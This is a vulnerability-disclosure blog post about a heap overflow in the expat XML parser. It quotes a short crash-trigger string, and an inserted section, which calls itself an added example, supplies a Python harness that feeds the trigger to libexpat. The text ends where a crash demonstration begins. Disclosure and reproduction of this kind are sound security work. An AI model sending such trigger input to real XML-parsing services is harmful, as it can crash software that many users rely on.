[CVE-2016-????] expat xml parser heap overflow vulnerability
TL;DR: I found an XML bug whose trigger fits into a tweet!
Around one month ago I found a nice bug in the expat XML parser. Expat is very popular: it is certainly used in Android and Google Chrome, and according to Wikipedia it is also used in Apache HTTP Server, Mozilla, Perl, Python and PHP. So it affects a lot of software projects and a lot of users.
I reported it to the Android team for disclosure but…
…today they notified me there was a bug collision, so I'm writing a blog post to disclose it.
The coolest thing about this bug is that the trigger can actually fit into a tweet :D
If you make it printable, it's more or less:
<?x0?><!DOCTYPE c0 SYSTEM ""[<!----><!ENTITY R0 ""0
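If you want to try the printable trigger against the libexpat on your own machine, here is an added example, not code from the original post and not expat's own outline tool. It is a small harness in the spirit of outline, written on top of Python's xml.parsers.expat binding to the system libexpat: it registers element handlers that build an indented outline, parses the whole buffer as final, and reports the expat version plus either success or the parse error. The function name `run_expat`, the `--stdin` flag and the well-formed sample `<a><b/><c><d/></c></a>` are my own constructions. Since the trigger above is only "more or less" the real one (the real bytes are not all printable), the embedded string is not guaranteed to reproduce the crash on a vulnerable build; on a patched libexpat you simply get a clean parse error, while a vulnerable build would kill the interpreter with a segfault instead of returning.

```python
# Added example (not from the original post or from expat itself): a minimal
# reproduction harness in the spirit of expat's outline tool, built on
# Python's xml.parsers.expat binding to the system libexpat.
import sys
from xml.parsers import expat

# Printable approximation of the trigger quoted in the post. The author says
# the real trigger is only "more or less" printable, so this string is not
# guaranteed to reproduce the crash on a vulnerable build.
PRINTABLE_TRIGGER = b'<?x0?><!DOCTYPE c0 SYSTEM ""[<!----><!ENTITY R0 ""0'

# Constructed well-formed sample (my own), used to show what the outline looks like.
WELL_FORMED_SAMPLE = b"<a><b/><c><d/></c></a>"


def run_expat(data: bytes) -> dict:
    """Parse one complete document with libexpat, outline-style.

    Registers start/end element handlers that record an indented outline,
    parses the buffer in one call with is_final=True, and returns the expat
    version, the outline collected so far and the parse error (if any).
    A patched libexpat reports a clean error for malformed input; a build
    with the heap overflow would crash the interpreter instead, so this
    function would never return.
    """
    depth = 0
    outline = []

    def start_element(name, attrs):
        nonlocal depth
        outline.append("  " * depth + name)
        depth += 1

    def end_element(name):
        nonlocal depth
        depth -= 1

    parser = expat.ParserCreate()
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element

    result = {
        "expat_version": expat.EXPAT_VERSION,  # e.g. "expat_2.5.0"
        "outline": outline,
        "error": None,
    }
    try:
        parser.Parse(data, True)  # whole document in one call, is_final=True
    except expat.ExpatError as exc:
        result["error"] = {
            "code": exc.code,
            "message": expat.ErrorString(exc.code),
            "line": exc.lineno,
            "column": exc.offset,
        }
    return result


def main() -> None:
    # Like outline, read the document from stdin when asked (--stdin);
    # otherwise feed the embedded printable trigger.
    data = sys.stdin.buffer.read() if "--stdin" in sys.argv else PRINTABLE_TRIGGER
    result = run_expat(data)
    print(result["expat_version"])
    for line in result["outline"]:
        print(line)
    if result["error"] is None:
        print("parsed OK")
    else:
        err = result["error"]
        print(f"expat error {err['code']} ({err['message']}) "
              f"at line {err['line']}, column {err['column']}")


if __name__ == "__main__":
    main()
```

Run it as `python3 harness.py` to feed the embedded trigger, or `python3 harness.py --stdin < trigger.xml` to feed the real (non-printable) bytes the way outline would read them. The version line tells you which libexpat Python is actually linked against, which is what matters when checking whether a given host is affected.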
Anyway let’s get back to business…
Here you can see the crash (outline is just a small tool that reads the XML from stdin and prints some information about it using the expat library):